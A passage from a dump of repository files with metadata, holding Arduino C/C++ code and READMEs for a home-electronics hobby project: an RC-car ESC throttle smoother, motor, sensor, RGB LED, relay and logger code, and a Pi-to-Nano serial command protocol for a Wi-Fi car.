MOTOR_SPEED_STEP;\n if (speed > MOTOR_HIGHEST_SPEED) {\n speed = MOTOR_HIGHEST_SPEED;\n }\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n\nvoid Motor::speeddown() {\n speed -= MOTOR_SPEED_STEP;\n if (speed < MOTOR_LOWEST_SPEED) {\n speed = MOTOR_LOWEST_SPEED;\n }\n analogWrite(enA, speed);\n analogWrite(enB, speed);\n long_execution_timer = MOTOR_LONG_EXECUTION_TIMER;\n short_execution_timer = MOTOR_SHORT_EXECUTION_TIMER;\n}\n"
},
{
"alpha_fraction": 0.676902174949646,
"alphanum_fraction": 0.7027173638343811,
"avg_line_length": 29.92436981201172,
"blob_id": "1f30a8a9f757055ac313870562c418e532029678",
"content_id": "2c0ee3077b4dec57db0243837f8daf193b4a140d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3680,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 119,
"path": "/escSmoother/escSmoother.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include <Servo.h>\n\n/*\n My RC controller:\n 1. connections:\n Throttle is on Channel 2\n The wheel is on Channel 1\n Switch button on Channel 3\n 2. functionality\n a. Throttle: smoothed so that\n 1) it can produce only motor speed in [NEUTRAL, FULL_FORWARD / THROTTLE_SMOOTH_FACTOR]\n to reach full speed, use the Wheel\n * work-around to that the Red Brick ESC + Motor does not spin until ~1550us pulse.\n There is a THROTTLE_SMOOTH_OFFSET about 30us as well.\n b. Wheel:\n 1) When the wheel is at neutral, ignore input from throttle;\n 2) otherwise the wheel input is transparently passed on to ESC.\n c. swith button on Channel 3: not used yet\n*/\n\n// Debug flags\n#define ENABLE_DEBUG // enable this line if get debug print\n\n#ifdef ENABLE_DEBUG\n#define DDD Serial\nunsigned long last_debug_print_time;\nunsigned long curr_time;\nconst unsigned long debug_print_interval = 500; // ms\n#endif // ENABLE_DEBUG\n\n// motor speed/drive constants\nconst long NEUTRAL = 1530;\nconst long FULL_FORWARD = 2000;\nconst long FULL_REVERSE = 1000;\n\nconst long THROTTLE_SMOOTH_FACTOR = 4;\nconst long THROTTLE_SMOOTH_OFFSET = 30;\nconst long BIAS_WINDOW = THROTTLE_SMOOTH_OFFSET;\n\n// channel 2 on pin D2\nconst int ch2Pin = 2;\nvolatile long pulseStartTimeCh2 = 0;\nvolatile long lastPulseWidthCh2 = 0;\n\n// channel 1 on pin D3\nconst int ch1Pin = 3;\nvolatile long pulseStartTimeCh1 = 0;\nvolatile long lastPulseWidthCh1 = 0;\n\n// channel 3 (on/off only) on pin D4\nconst int ch3Pin = 4;\n\n// two ESC can be connected\nconst int esc0Pin = A0;\nconst int esc1Pin = A1;\n\nServo esc0, esc1;\n\nvoid setup() {\n attachInterrupt(digitalPinToInterrupt(ch2Pin), pulseInCh2, CHANGE);\n attachInterrupt(digitalPinToInterrupt(ch1Pin), pulseInCh1, CHANGE);\n esc0.attach(esc0Pin);\n esc1.attach(esc1Pin);\n //pinMode(ch3Pin, INPUT_PULLUP);\n#ifdef ENABLE_DEBUG\n DDD.begin(9600);\n last_debug_print_time = 0;\n#endif\n}\n\nvoid loop() {\n long wheelPulseWidth = lastPulseWidthCh1;\n long throttlePulseWidth = lastPulseWidthCh2;\n#ifdef ENABLE_DEBUG\n curr_time = millis();\n if (last_debug_print_time > curr_time || last_debug_print_time + debug_print_interval <= curr_time) {\n DDD.print(\"Ch1: \");\n DDD.print(wheelPulseWidth);\n DDD.print(\"; Ch2: \");\n DDD.println(throttlePulseWidth);\n last_debug_print_time = millis();\n }\n#endif\n // if Wheel is not at neutral\n if (wheelPulseWidth < NEUTRAL - BIAS_WINDOW || wheelPulseWidth > NEUTRAL + BIAS_WINDOW) {\n // pass Wheel throttle transparently to both ESC's\n esc0.writeMicroseconds(wheelPulseWidth);\n esc1.writeMicroseconds(wheelPulseWidth);\n } else {\n // the wheel is at neutral, apply smoothed throttle input\n if (throttlePulseWidth > NEUTRAL + BIAS_WINDOW) {\n esc0.writeMicroseconds((throttlePulseWidth - NEUTRAL - BIAS_WINDOW) / THROTTLE_SMOOTH_FACTOR + NEUTRAL + THROTTLE_SMOOTH_OFFSET);\n esc1.writeMicroseconds((throttlePulseWidth - NEUTRAL - BIAS_WINDOW) / THROTTLE_SMOOTH_FACTOR + NEUTRAL + THROTTLE_SMOOTH_OFFSET);\n } else if (throttlePulseWidth >= FULL_REVERSE) {\n esc0.writeMicroseconds(throttlePulseWidth);\n esc1.writeMicroseconds(throttlePulseWidth);\n } else {\n // RC controller could be turned off. 
we want to arm ESC anyway.\n esc0.writeMicroseconds(FULL_REVERSE);\n esc1.writeMicroseconds(FULL_REVERSE);\n }\n }\n}\n\nvoid pulseInCh2() {\n if (digitalRead(ch2Pin)) {\n pulseStartTimeCh2 = micros();\n } else {\n lastPulseWidthCh2 = micros() - pulseStartTimeCh2;\n }\n}\n\nvoid pulseInCh1() {\n if (digitalRead(ch1Pin)) {\n pulseStartTimeCh1 = micros();\n } else {\n lastPulseWidthCh1 = micros() - pulseStartTimeCh1;\n }\n}\n"
},
{
"alpha_fraction": 0.5927272439002991,
"alphanum_fraction": 0.6327272653579712,
"avg_line_length": 16.1875,
"blob_id": "afd49ee3a7c1a5b9013e4f87e1808131e103d032",
"content_id": "a9c4ebfd868da0344359dbb8dfbab5eed6d91911",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 16,
"path": "/elSkateboard/VoltageSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __VOLTAGE_SENSOR_H__\n#define __VOLTAGE_SENSOR_H__\n\n#include <Arduino.h>\n#define VOLTAGE_RESOLUTION 0.0244 // = 5V * 5 / 1024\n\nclass VoltageSensor\n{\n private:\n int pin;\n\n public:\n VoltageSensor(int _pin);\n float read();\n};\n#endif // __VOLTAGE_SENSOR_H__\n"
},
{
"alpha_fraction": 0.6759322285652161,
"alphanum_fraction": 0.680338978767395,
"avg_line_length": 42.39706039428711,
"blob_id": "9c9345785458fb34d7e03c066bc4b5939a9ee5a0",
"content_id": "e478c52e738b9d3d39fe35e79ec3dd7cabefb878",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2950,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 68,
"path": "/WifiCar/README.md",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "The ambition of this little project is to build a remote control car connected through Wifi network.\n\n# Materials\n- Raspberry Pi Model B+ (x1)\n- Arduino Nano (x1)\n- USB cable for Arduino Nano\n- USB wifi dongle for Pi\n\n# Building steps\n\n## Setup Arduino IDE on Pi\n\n## Test serial over USB\n1. connect: Pi USB <-> Nano USB\n2. upload sketch ```echoSerial.ino``` to Nano\n3. start script ```echoSerial.py``` on Pi\n4. type lines in cmd on Pi and Nano should echo whatever sent over back to Pi\n\n# Design\n\n## Communication protocol between Pi and Nano over serial port\n- only ASCII characters are used\n- it uses a simple command and response mechanism\n- procedure on Pi\n - Pi starts in IDLE state\n - in IDLE state, Pi can send a COMMAND and enter WAIT state\n - in WAIT state, Pi waits for a RESPONSE, and enter IDLE state if one arrives or WAIT_TIMER expires\n- procedure on Nano\n - Nano starts in IDLE state\n - in IDLE state, Nano waits for one COMMAND and enters WORK state if one arrives\n - in WORK state, Nano executes received COMMAND and sends one RESPONSE after it is done\n - in WORK state, Nano enters IDLE state after a RESPOMSE is sent\n- protocol data unit format:\n - each field is represented as <field name>\n - all fields are strings\n - ```\"<type>:<type specific fields>;\\n\"```\n - ```<type>``` can be one of values ```(\"CMD\", \"RSP\", \"DEB\")```\n- COMMAND:\n - ```\"CMD:<operation>[:<paremeter0>:<paremeter1>...:<paremeterN>];\\n\"```\n - ```<operation>``` can be one of values:\n - ```\"ECHO\"```: ask Nano to compose a RESPONSE that contains all parsed field of this message\n - ```\"TEMPER\"```: report temperature using temperature sensor. One paremeter is expected in RESPONSE. One successful RESPONSE could be ```\"RSP:OK:27.3;\\n```.\n - ```\"FORWARD\"```: drive motor to move forward\n - ```\"BACKWARD\"```: drive motor to move backward\n - ```\"STOP\"```: motor stop\n - ```\"SPEEDUP\"```: motor speed up\n - ```\"SPEEDDOWN\"```: motor speed down\n - ```\"TURNLEFT\"```: motor turn left\n - ```\"TURNRIGHT\"```: motor turn right\n- RESPONSE:\n - ```\"RSP:<status>[:<paremeter0>:<paremeter1>...:<paremeterN>];\\n\"```\n - ```<status>``` can be:\n - ```\"OK\"```: execution succeeded\n - ```\"NOK\"```: execution failed\n - ```\"NOT_SUPPORTED\"```: command is not supported\n- DEBUG MESSAGE:\n - ```\"DEB:<a string>;```\n - this can only be sent from Nano to Pi, not vice versa.\n - used to send debug message or log. Such a message is not parsed or interpreted by this protocol.\n- timers:\n - WAIT_TIMER\n - how much miliseconds should Pi wait after sending a COMMAND before it receives a RESPONSE\n - on expiration: discard current COMMAND, increase COUNTER_WAIT_TIMER, then go to IDLE state\n - RESET_TIMER\n - how much miliseconds should Pi wait after it resets Nano\n - when this timer is bigger than zero, Pi should not send any COMMAND to Nano\n- counters:\n - COUNTER_WAIT_TIMER: when it is bigger than MAX_WAIT_TIMER, reset Nano"
},
{
"alpha_fraction": 0.7202268242835999,
"alphanum_fraction": 0.7240075469017029,
"avg_line_length": 23.090909957885742,
"blob_id": "ecf8271cda61915498d7d4e6e179391990599f2a",
"content_id": "62b0d27271b265792a34e384ab192eccb374ad9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 529,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 22,
"path": "/ArduinoController/bitlashInfraredSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Provide bitlash wrap-up of a infrared sensor instance.\n Light sensor instance has to be:\n 1. named \"infraredSensor\";\n 2. exist as global variale\n*/\n\nnumvar infraredSensor_get(void)\n{\n return infraredSensor.get();\n}\n\nnumvar infraredSensor_pin(void)\n{\n return infraredSensor.pin();\n}\n\nvoid register_bitlash_infraredSensor(void)\n{\n addBitlashFunction(\"infraredSensor_get\", (bitlash_function) infraredSensor_get);\n addBitlashFunction(\"infraredSensor_pin\", (bitlash_function) infraredSensor_pin);\n}"
},
{
"alpha_fraction": 0.6622418761253357,
"alphanum_fraction": 0.6710914373397827,
"avg_line_length": 18.882352828979492,
"blob_id": "7dcb8cbc9303b236ee495259e8766b6b2c2fa539",
"content_id": "faad02703d4262bf7ef328cce8ae122b3acb7a92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 34,
"path": "/lib/InfraredSensor/InfraredSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n \n Connection:\n VCC -> 5V\n GND -> GND\n OUT -> any digital INPUT pin\n */\n\n#ifndef __INFRAREDSENSOR_H__\n#define __INFRAREDSENSOR_H__\n\n#define InfraredSensor_ON LOW\n#define InfraredSensor_OFF HIGH\n\n#include <Arduino.h>\n\nclass InfraredSensor\n{\nprivate:\n unsigned int _pin;\n\npublic:\n InfraredSensor(unsigned int __pin);\n unsigned int pin(void);\n void begin(void);\n bool get(void);\n};\n\n#endif // __INFRAREDSENSOR_H__\n\n\n"
},
{
"alpha_fraction": 0.5864502191543579,
"alphanum_fraction": 0.5942131280899048,
"avg_line_length": 22.616666793823242,
"blob_id": "fb3ed469ab684403e329d0c3f8ffdcb96ed29d99",
"content_id": "07863f7529f53ad45e2f0e851632936155317109",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1417,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 60,
"path": "/elSkateboard/Logger.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#ifndef __LOGGER_CPP__\n#define __LOGGER_CPP__\n\n#include \"Logger.h\"\n\nLogger::Logger(String _fileName):\n fileName(_fileName){\n LogS logs[LOGGER_BUFFER_LENGTH];\n entryNum = 0;\n writeIndex = 0;\n readIndex = 0;\n\n for (int i=0; i<LOGGER_BUFFER_LENGTH; i++) {\n logs[i].timeMs = 0;\n logs[i].type = EMPTY;\n logs[i].value = 0.0;\n }\n}\n\nvoid Logger::clearFile() {\n if (FileSystem.exists(fileName.c_str())) {\n FileSystem.remove(fileName.c_str());\n }\n}\n\nvoid Logger::writeToMem(long timeMs, byte type, float value) {\n byte wi = writeIndex;\n writeIndex = (writeIndex + 1) & LOGGER_BUFFER_INDEX_MASK;\n entryNum++;\n logs[wi].timeMs = timeMs;\n logs[wi].type = type;\n logs[wi].value = value;\n}\n\nvoid Logger::writeToFile() {\n byte ri;\n if (entryNum > 0) {\n File dataFile = FileSystem.open(LOGGER_DEFAULT_FILE_NAME, FILE_APPEND);\n while (entryNum > 0) {\n ri = readIndex;\n readIndex = (readIndex + 1) & LOGGER_BUFFER_INDEX_MASK;\n entryNum--;\n #ifdef ENABLE_DEBUG\n DDD.print(logs[ri].timeMs);\n DDD.print(\"\\t\");\n DDD.print(logs[ri].type);\n DDD.print(\"\\t\");\n DDD.println(logs[ri].value);\n #endif\n dataFile.print(logs[ri].timeMs);\n dataFile.print(\"\\t\");\n dataFile.print(logs[ri].type);\n dataFile.print(\"\\t\");\n dataFile.println(logs[ri].value);\n }\n dataFile.close();\n }\n}\n\n#endif // __LOGGER_CPP__\n"
},
{
"alpha_fraction": 0.6548821330070496,
"alphanum_fraction": 0.6632996797561646,
"avg_line_length": 17,
"blob_id": "3e40c02f14c3aca48de90124b3ae980f88cfe175",
"content_id": "dc85b9d0428940d4f3eeab5cb4c96cf76f11481c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 594,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 33,
"path": "/lib/LightSensor/LightSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"LightSensor.h\"\n\nLightSensor::LightSensor(unsigned int __pin): _pin(__pin)\n{\n}\n\nvoid LightSensor::begin()\n{\n pinMode(_pin, INPUT);\n}\n\nunsigned int LightSensor::pin()\n{\n return _pin;\n}\n\nbool LightSensor::get()\n{\n if (digitalRead(_pin) == LIGHTSENSOR_DARK)\n {\n return LIGHTSENSOR_DARK;\n } else {\n return LIGHTSENSOR_LIGHT;\n }\n}\n"
},
{
"alpha_fraction": 0.5955590605735779,
"alphanum_fraction": 0.6249008774757385,
"avg_line_length": 20.016666412353516,
"blob_id": "2a68102f3835dab19b9d7bf07a1ac680915e9798",
"content_id": "1d27b10a7e343b98c6856203f715be7a86bb5785",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 60,
"path": "/lib/RbgLight/examples/RbgLight/RbgLight.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nControl RGB LED light.\n\nConnection:\n V -> GND\n R -> as defined below\n B -> as defined below\n G -> as defined below\n*/\n#include \"RbgLight.h\"\n#include \"bitlash.h\"\n\n#define SERIAL_BAUD_RATE 57600\n\nRbgLight rbgLight(9, 10, 11, HIGH);\n\nnumvar timer1(void) { \n\treturn TCNT1; \t// return the value of Timer 1\n}\n\nnumvar light_on(void)\n{\n if (getarg(0) == 0)\n {\n // use default color\n rbgLight.on(rbgLight.default_color());\n } else {\n rbgLight.on(getarg(1));\n }\n return 0;\n}\n\nnumvar light_off(void)\n{\n rbgLight.off();\n return 0;\n}\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n rbgLight.begin();\n initBitlash(SERIAL_BAUD_RATE);\n randomSeed(0);\n addBitlashFunction(\"timer1\", (bitlash_function) timer1);\n addBitlashFunction(\"light_on\", (bitlash_function) light_on);\n addBitlashFunction(\"light_off\", (bitlash_function) light_off);\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n runBitlash();\n //rbgLight.on(random(0, 8));\n //rbgLight.flash_pattern(random(0, 8));\n //rbgLight.on(random(0, 8));\n //digitalWrite(1, HIGH);\n //delay(1000);\n // rbgLight.off();\n //rbgLight.flash(random(1, 8));\n //delay(500);\n}\n"
},
{
"alpha_fraction": 0.4595375657081604,
"alphanum_fraction": 0.4778420031070709,
"avg_line_length": 30.18181800842285,
"blob_id": "e41e15d059c9342c5dd0f0768a0404397b9424d8",
"content_id": "9ea6db864d8d4be76619721912e3c0244d1814f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 33,
"path": "/lib/UltraSoundDistanceMeas/README.md",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "# Control ultra sound distance measuring chip\n \nDesign Goals: This library is designed to be... \n \n* Easy control ultra sound distance measuring chip\n \nSupported Boards: \n \n* Uno\n\n## Pin layout\n\nThe table below shows how to connect the the pins of the RBG LED light\nto Arduino UNO board.\nR, B, and G pins are configurable.\n\n| PIN | RBG LED | Arduino UNO | ATtiny25/45/85 [0] | ATtiny44/84 [1] |\n|-----|----------|-------------|--------------------|-----------------|\n| 1 | VCC | 5V | | |\n| 2 | Trig | 9 | | |\n| 3 | Echo | 8 | | |\n| 4 | GND | GND | | |\n\n\n**Constructor:**\n\n UltraSoundDistanceMeas(unsigned int _trig_pin, unsigned int _echo_pin);\n _trig_pin: which pin is connected to Trig;\n _echo_pin: which pin is connected to Echo;\n\n**Usage:**\n\n See example. Note that measured distance is in micrometers.\n \n "
},
{
"alpha_fraction": 0.5317782163619995,
"alphanum_fraction": 0.5371872782707214,
"avg_line_length": 22.4761905670166,
"blob_id": "f3b50e3b34b5658fdef6d48f2ea789afc1f7ce10",
"content_id": "44b787eda866ff7e44e4e05a4034fd9f523c8e4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2958,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 126,
"path": "/lib/RbgLight/RbgLight.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"RbgLight.h\"\n\n/****************************************************************************/\nvoid RbgLight::on(unsigned int color)\n{\n if (color & RBGLIGHT_RED)\n {\n digitalWrite(r_pin, light_on_lvl);\n } else {\n digitalWrite(r_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_BLUE)\n {\n digitalWrite(b_pin, light_on_lvl);\n } else {\n digitalWrite(b_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_GREEN)\n {\n digitalWrite(g_pin, light_on_lvl);\n } else {\n digitalWrite(g_pin, light_off_lvl);\n }\n}\n\nvoid RbgLight::begin()\n{\n pinMode(r_pin, OUTPUT);\n pinMode(b_pin, OUTPUT);\n pinMode(g_pin, OUTPUT);\n cur_lvl = 10;\n}\n\nvoid RbgLight::flash(unsigned int color, unsigned int interval)\n{\n on(color);\n delay(interval);\n off();\n}\n\n/****************************************************************************/\nvoid RbgLight::off()\n{\n digitalWrite(r_pin, light_off_lvl);\n digitalWrite(b_pin, light_off_lvl);\n digitalWrite(g_pin, light_off_lvl);\n}\n\n/****************************************************************************/\nRbgLight::RbgLight( unsigned int _r_pin, unsigned int _b_pin,\n unsigned int _g_pin, bool _light_on_lvl):\n r_pin(_r_pin), b_pin(_b_pin), g_pin(_g_pin), light_on_lvl(_light_on_lvl)\n{\n light_off_lvl = !light_on_lvl;\n pattern_progressing_increse = true;\n pattern_progressing_step = 20;\n _default_color = RBGLIGHT_RED;\n}\n\nvoid RbgLight::set_pattern(unsigned int _pattern)\n{\n switch (_pattern)\n {\n case RBGLIGHT_PATTERN_PROGRESSING:\n pattern = RBGLIGHT_PATTERN_PROGRESSING;\n break;\n default:\n pattern = RBGLIGHT_PATTERN_PROGRESSING;\n }\n}\n\nunsigned int RbgLight::default_color()\n{\n return _default_color;\n}\n\nvoid RbgLight::flash_pattern(unsigned int color)\n{\n if (color & RBGLIGHT_RED)\n {\n analogWrite(r_pin, cur_lvl);\n } else {\n digitalWrite(r_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_BLUE)\n {\n analogWrite(b_pin, cur_lvl);\n } else {\n digitalWrite(b_pin, light_off_lvl);\n }\n\n if (color & RBGLIGHT_GREEN)\n {\n analogWrite(g_pin, cur_lvl);\n } else {\n digitalWrite(g_pin, light_off_lvl);\n }\n // calculate next level\n if (pattern_progressing_increse)\n {\n cur_lvl += pattern_progressing_step;\n if (cur_lvl >= 256)\n {\n pattern_progressing_increse = false;\n cur_lvl = 255;\n }\n } else {\n cur_lvl -= pattern_progressing_step;\n if (cur_lvl < 0)\n {\n pattern_progressing_increse = true;\n cur_lvl = pattern_progressing_step;\n }\n }\n}\n"
},
{
"alpha_fraction": 0.6438716650009155,
"alphanum_fraction": 0.6501840949058533,
"avg_line_length": 21.341176986694336,
"blob_id": "d7345e376757bcc53f81ab71925e2740098e0cf0",
"content_id": "36abd3e9ab87388b05790a91b5faa7142a442a38",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1901,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 85,
"path": "/lib/RbgLight/RbgLight.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n/**\n * @file RbgLight.h\n *\n * Class declaration for RbgLight and helper enums\n */\n\n#ifndef __RBGLIGHT_H__\n#define __RBGLIGHT_H__\n\n#include <Arduino.h>\n\n#define RBGLIGHT_RED 1\n#define RBGLIGHT_BLUE 2\n#define RBGLIGHT_GREEN 4\n\n#define RBGLIGHT_PATTERN_PROGRESSING 0\n\nclass RbgLight\n{\nprivate:\n unsigned int r_pin;\n unsigned int b_pin;\n unsigned int g_pin;\n bool light_on_lvl;\n bool light_off_lvl;\n unsigned int pattern;\n bool pattern_progressing_increse;\n unsigned int pattern_progressing_step;\n unsigned int cur_lvl;\n unsigned int _default_color;\n\npublic:\n\n /**\n * @name Primary public interface\n *\n * These are the main methods you need to operate the chip\n */\n /**@{*/\n\n /**\n * Constructor\n *\n * Creates a new instance of this driver. Before using, create\n * an instance and send in the unique pins that this chip is\n * connected to.\n *\n * @param r_pin The pin attached to red controlling pin\n * @param b_pin The pin attached to blue controlling pin\n * @param g_pin The pin attached to green controlling pin\n * @param light_on_lvl HIGH|LOW to trigger LED light on\n */\n RbgLight(unsigned int _r_pin, unsigned int _b_pin,\n unsigned int _g_pin, bool _light_on_lvl);\n\n void begin(void);\n\n /**\n * Turn light on with given color.\n */\n void on(unsigned int color);\n\n /**\n * Turn light off.\n */\n void off(void);\n \n void set_pattern(unsigned int _pattern);\n void flash(unsigned int color, unsigned int interval = 100);\n void flash_pattern(unsigned int color);\n unsigned int default_color(void);\n\n /**@}*/\n\n};\n\n#endif // __RBGLIGHT_H__\n\n\n"
},
{
"alpha_fraction": 0.6156522035598755,
"alphanum_fraction": 0.6634782552719116,
"avg_line_length": 24.55555534362793,
"blob_id": "5abd8cfe9e082d7d42ef0934b592f7d11eb3a83b",
"content_id": "bb92908e43171b60ad0247f415efbbfa1d1c0b8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1150,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 45,
"path": "/lib/UltraSoundDistanceMeas/examples/UltraSoundDistanceMeas/UltraSoundDistanceMeas.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nControl ultra sound echo module to measure distance.\n\nConnection:\n VCC -> 5V\n Trig -> Control input\n Echo -> Output\n GND -> GND\n*/\n\n#include \"UltraSoundDistanceMeas.h\"\n\nUltraSoundDistanceMeas ultraSoundDistanceMeas(9, 8);\n\n#define ULTRASOUND_TRIG 9\n#define ULTRASOUND_ECHO 8\n\nunsigned long distance; // in um\n#define ULTRASOUND_SPEED 340 // 340 m/s = 340 micrometer/microsecond\n/* lowest distance: 2cm = 2*1000 mm = 2000*1000 micrometer.\n longest distance: 450 cm = 450*1000*1000 micrometer\n so \"unsigned long\" should suffice.\n*/\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n ultraSoundDistanceMeas.init();\n Serial.begin(9600);\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n distance = ultraSoundDistanceMeas.measure();\n if (distance !=0 )\n {\n Serial.print(\"distance = \");\n Serial.print(distance);\n Serial.print(\" micrometer = \");\n Serial.print(distance/1000);\n Serial.println(\" mm\");\n delay(2000);\n } else {\n Serial.println(\"Timed out. It's either too far away, or it's too close!\");\n }\n}\n"
},
{
"alpha_fraction": 0.5905796885490417,
"alphanum_fraction": 0.5905796885490417,
"avg_line_length": 11.590909004211426,
"blob_id": "bc4068dfe209a460700d98b66ea488e8c20f3a95",
"content_id": "4a807fd37fb30338bddf8ecb34aebc9b849bc08e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 22,
"path": "/ArduinoController/Cmd.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n*/\n\n#ifndef __CMD_H__\n#define __CMD_H__\n\n#include <Arduino.h>\n\nclass Cmd\n{\nprivate:\n String _cmdS;\n\npublic:\n\n // constructor with a cmd string, without the leading \"CMD;\"\n Cmd(String __cmdS);\n // execute commands\n void execute(void);\n};\n\n#endif // __CMD_H__"
},
{
"alpha_fraction": 0.6304348111152649,
"alphanum_fraction": 0.6397515535354614,
"avg_line_length": 13.636363983154297,
"blob_id": "fd0c96d908a2c0a25b2c6dfe117df7d37c0abebc",
"content_id": "38d62bf985856771e9d4163964f5d1102fa158cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 22,
"path": "/lib/Relay/examples/Relay/Relay.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\nControl a relay\n\nConnection:\n\n*/\n#include \"Relay.h\"\n\nRelay relay(9, HIGH);\n\n// the setup function runs once when you press reset or power the board\nvoid setup() {\n relay.begin(LOW);\n}\n\n// the loop function runs over and over again forever\nvoid loop() {\n relay.on();\n delay(1);\n relay.off();\n delay(1);\n}\n"
},
{
"alpha_fraction": 0.5935251712799072,
"alphanum_fraction": 0.6474820375442505,
"avg_line_length": 20.346153259277344,
"blob_id": "c855756711aecfd0748aae9ca0645fda1ba7444f",
"content_id": "df0e7dba1068a2b6e149677172f989ab3d49814a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 556,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 26,
"path": "/LcdDisplay/DS3231.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#ifndef __DS3131_H__\n#define __DS3131_H__\n\n#include <Arduino.h>\n#include \"Wire.h\"\n\nconst byte DS3231_I2C_ADDRESS\t= 0x57;\n\nclass DS3231\n{\nprivate:\n int i2c_addr;\n byte second, minute, hour, dayOfWeek, dayOfMonth, month, year;\n byte decToBcd(byte val);\n byte bcdToDec(byte val);\n void _readTime(void);\n\npublic:\n DS3231(int _i2c_addr);\n void begin(void);\n void setTime(byte second, byte minute, byte hour, byte dayOfWeek,\n byte dayOfMonth, byte month, byte year);\n String readTime(void);\n};\n\n#endif\t// __DS3131_H__\n"
},
{
"alpha_fraction": 0.44932734966278076,
"alphanum_fraction": 0.4681614339351654,
"avg_line_length": 32.818180084228516,
"blob_id": "dd956a3baf424a696fcb8805db2f42839f9ef437",
"content_id": "3d4349d07a8fea9354c8394fc1993433a9787559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1115,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 33,
"path": "/lib/RbgLight/README.md",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
